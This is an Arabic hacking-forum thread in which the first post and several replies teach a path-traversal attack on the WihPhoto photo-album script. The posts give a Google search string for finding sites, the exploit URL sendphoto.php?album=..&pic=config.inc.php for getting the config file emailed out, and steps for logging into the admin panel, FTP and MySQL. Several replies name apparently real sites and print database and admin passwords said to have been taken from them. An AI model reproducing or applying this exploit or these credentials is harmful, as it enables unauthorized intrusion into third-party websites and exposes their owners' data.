هذه طريقه تعلمتها في فتره قصيره ومافي شئ صعب على التعلم واقتصارها على الرجال في التهكير والاختراق

جربوها وانا بنت ابوي وبتدعون لي واتمنى يختصرون كبار الهكرز الطريقه على كيف تخترق بهذه الطريقه

وعن طريق ثغرات اخرى ..

يمكن مشرفين العقرب الاحمر ماودهم احد يعرف هالطريقه ونفسها طريقه اخرى مطبقه على المنتديات

واختراقها!!!


ان مارعصوها هنا خلال يومين حقت المنتديات برعصها انا لكم





يالله بسم الله على بركه الله

اولا نفتح اي محرك بحث مثلا محرك بحث قوقل ونكتب فيه powered by wihphoto ونقوله ابحث يامال الغنات

وطبعا المقصود من powered by wihphoto يعني نبيك يامحرك البحث تظهر لنا المواقع اللي فيها البوم صور

عقبن الله مير يسلمني ويخليني لي ولايحرمن مني
بيظهر لنا مواقع واجد فيها البوم صور

على سبيل المثال هالموقع

http:familiebrunner.ch/WihPhoto/

عقبن نضيف عليه هالكلمه sendphoto.php وطبعا البومات الصور فيها خاصيه ارسال الصوره اللي تعجبنا ويصير بالشكل هذا
http:familiebrunner.ch/WihPhoto/sendphoto.php

اها طيب حلو كتير كتير خلونا هالاحين نفرنك شوي باخر اليورل وبدال ما نطلب انوه يرسل صوره نبيه يرسل لنا فايل config.ini.php <<<<<طبعا هذا الفايل يحتوي على اسم ويوزر وباسوورد قاعده البيانات

والفرنكه تكون بوضع الثغره وتحريف اليورل شوي والثغره هي
sendphoto.php?album=..&pic=config.inc.php

ويتم ربطها مع اليورل بالشكل هذا
http:familiebrunner.ch/WihPhoto/sendphoto.php?album=..&pic=config.inc.php

بيفتح لك صفحه مكتوب فيها Sende config.inc.php an وتحتها مربع حط فيه ايميلك وراح يرسلك فايل config.inc.php افتحه بتلقى فيه اشياء كثيره يهمنا منها



$database = "usr_web6_1"; // MySQL Datenbankname
$sqlhost = "localhost"; // MySQL Hostname
$sqluser = "web6"; // MySQL Username
$sqlpass = "18791879"; // MySQL Passwort


عقبن يالله كملو الباقي تنقزون للكنترول بنل عن طريق اليورل هذا وغالبا المواقع الاجنبيه اللي فيها البوم صور يكون من هنا كنترولها
http:/62.208.174.166/user/index.php

اللي يجوز لكم طبعا نلاحظ ان اليوزر هنا صاير web6 احيانا مايمشي معنا بس ايزي نعدله من web6 الى web1 ونفس الباسوورد

ومثال على الشرح نفس الموقع اللي واضعينه كحقل تجارب
للدخول عن طريق الاف تي بي
بالمتصفح مايحتاج برامج أرعص على هاليورل
ftp.familiebrunner.ch/
واليوزر هو
web1
والباسوورد
18791879
تراي حطيت هالشرح للاستفاده ولكي اثبت لكم بان الهكرز ليس بالبرامج بل باستغلال نقاط ضعف معينه في الموقع ويستفاد منها للتوصل الى معلومات تفيد بالاختراق و اما من يقول هذا برنامج يخترق مواقع ومدري ايش سلمو لي عليه وقولو له لمياء بنت ابوها تسلم عليك وتقول رح اطحن فجل اصرف لك

والله ولي التوفيق اتمنى ان لايستغل ضد المواقع العربيه بليز بليز

تحياتي لكم كلكم



لمياء بنت ابوها|4| <<< المنقول منه

الموضوع منقول وتحياتي لكم

يسلموووو على هالشرح الحلوووو والسهل انا اشهد بنت ابوك ماقلت شى

(ارعص) ...((قصمنجيه)).او.(حوطيه)... |3| لا مفر هين والله والنعم والف نعم والله

<<يحس انه بيجيه مخمس على راسه :D :D :D

تحياتى |1|

انا بعمل كل حاجة تمام بس فى مشكلة وهى انى بحط الايميل لكن مش بيرسل لى الملف اللى انت قولت علية ارجوكم الافادة

:D

مشكورين على الردود

وبالنسبه للاخ fizom

الطريقه شغالة 100 %
ماننقلت الشرح الا بعد ماجربتها
هذا رابط الموقع الي جربت الطريقه عليه
http://www.heddesdorfer-husaren.de/

وهذا ملف
// ================================================== ====================
$startsite = 1;

// MySQL-DB Einstellungen
// ======================
$database = "heddesdorfer_husaren_de"; // MySQL Datenbankname
$sqlhost = "mysql8.webpack.hosteurope.de"; // MySQL Hostname
$sqluser = "ftp35004"; // MySQL Username
$sqlpass = "TrustNo1"; // MySQL Passwort

// Passwort zum hinzufügen von Bildinformationstext
// ================================================
$adminpass= "deisde";

الموضوع مشروح من هاي هكر قبل ستة أشهر يمكن وأعتقد ان الشرح موجود في الكتاب

تحياتي

صراحة ماعرفها لمياء ذي بس لقيتها منزله الموضوع
بمنتدى العقرب الاحمر

الطريقه ماشيه صح بس في مشكله كيف بدنا ندخل على الموقع حتى نحط المعلومات

اخوي دارك
---------------------------------------------------------------------
اللي يجوز لكم طبعا نلاحظ ان اليوزر هنا صاير web6 احيانا مايمشي معنا بس ايزي نعدله من web6 الى web1 ونفس الباسوورد
----------------------------------------------------------------------

مكتوبه بالشرح جرب

السلام عليكم

مثل ما قال اخوي ابو خالد والظاهر انها MaxHak2000 هو الي شرحها

تحياتي لك اخي سام

مشكور على ردك اخوي المتمكن بس انا حبيت انقل الموضوع حتى الكل بستفيد
ولا ادري انه مكرك او من الي شارحه اول
ا>ا انهخ مكرر يتفاهم مع الموضوع بوخالد :D

اتمنى ان شرحى يزدكم بشىء
انا والله كن كاتب الموضوع ومجهزه لاكن الاخ سام كتبه الاول
المهم مش مين الى كتب الدرس المهم مين الى استفاد منه
انشاء الله انهردا نتكلم عن صغرة يمكن تكون مش جديدة لاكنها سهلة وفعالة


المطلوب انك تروح للجوجل وتكتب:
--------------------
POWERED BY WIHPHOTO
--------------------
مثلا يجيلك موقع ذى:
-----------------------------------------------------------------------
http://www.team-as-motorsport.de/24Std2003/Berichterstattung/index.php4
-----------------------------------------------------------------------
نحذف كلمة:
-----------
INDEX.PHP
-----------
ونكتب بدلها:
-----------------------------------------
sendphoto.php?album=..&pic=config.inc.php
-----------------------------------------
يفتحلك صفحة تكتب فيها الايميل الخاص بيك وهتتبعتلك رسالة تبحث جواها عن
------------------------------------------------------------------------
عنوان قاعدة البيانات $sqlhost = "db07.puretec.de"; // MySQL Hostname
اسم الدخول الخاص بقاعدة البيانات $sqluser = "p6835059"; // MySQL Username
كلمة المرور الخاصة بقاعدة البيانات $sqlpass = "ossi99"; // MySQL Passwort
كلمة المرور الخاصة بمدير الصور $adminpass= "porsche2003";
------------------------------------------------------------------------
طبعا احنا اهم شىء عندنا هو كلمة المرور الخاصة بمدير الصور طيب
ندخل على لوحة التحكم اذاى؟

نكتب:
----------------------------------------------------------------------
http://www.team-as-motorsport.de/24Std2003/Berichterstattung/admin.php
----------------------------------------------------------------------
وطبعا نكتب كلمة المرور الخاصة بمدير الصور
ونغير فى الصور ذى ما انت عاوز

وتقدر تدخل على قاعدة البيانات عن طريق برنامج اكسس لاكن لو كنت عاوز تحكم اقوى فانصحك ب
mysql front

وطبعا ما فيش مانع لو تحاول تدخل على الFTP
الخاص بالموقع عن طريق كلمة المرور الخاصة بقاعدة البيانات والله اعلم

----------------------------------------
عمل الصغرة:
-----------

* نسخ ملف الكوفينج الى كلنا عرفينه
وارسال نسخة منه للميل الى انت بتحدده

----------------------------------------

اى استفسار انا فى الخدمة
تحياتى
EVIL-MASTER

مشكوور اخوي EVIL-MASTER
على توضيحك الموضوع ويعطيك العافيه

وزى ما قلت مش مهم مين الى كتب الموضوع المهم مين الى استفاد
وانشاء الله الكل راح يستفاد من الموضوع:)

مشكوووووووور على توضيحك للموضوع


لكن شلون نقدر ندخل على قاعدة بيانات الموقع من الاكسس او mysql fornt؟؟؟؟؟؟؟؟؟؟؟|1|

كاتب الرسالة الأصلية : q8hacker
مشكوووووووور على توضيحك للموضوع


لكن شلون نقدر ندخل على قاعدة بيانات الموقع من الاكسس او mysql fornt؟؟؟؟؟؟؟؟؟؟؟|1|

|3|

اخوي افتح الاكسس
واضغط على زر new

بيجيك مستطيل فيه خيارات على ايديك المين << (خيارات مو خيار الي ينوكل ) :D

اختر منه project(existing data(

مشكوور على مروورك

والله اخى لو ما عرفت تعمل ذى الاخ سام ما قال ادخل على برنامج
mysql front
واختار كونيكت
وكتب البيانات كالتالى

------------------------------------------------------------------------
عنوان قاعدة البيانات $sqlhost = "db07.puretec.de"; // MySQL Hostname
اسم الدخول الخاص بقاعدة البيانات $sqluser = "p6835059"; // MySQL Username
كلمة المرور الخاصة بقاعدة البيانات $sqlpass = "ossi99"; // MySQL Passwort
كلمة المرور الخاصة بمدير الصور $adminpass= "porsche2003";
------------------------------------------------------------------------
وانشاء الله ما تقصر معاك
تحياتى:)

كاتب الرسالة الأصلية : دعباس
يسلموووو على هالشرح الحلوووو والسهل انا اشهد بنت ابوك ماقلت شى

(ارعص) ...((قصمنجيه)).او.(حوطيه)... |3| لا مفر هين والله والنعم والف نعم والله

<<يحس انه بيجيه مخمس على راسه :D :D :D

تحياتى |1|

سلااااااام عليك ياسام يعطيك الف عافيه وموضوع يستاهل

زي صاحبه طيب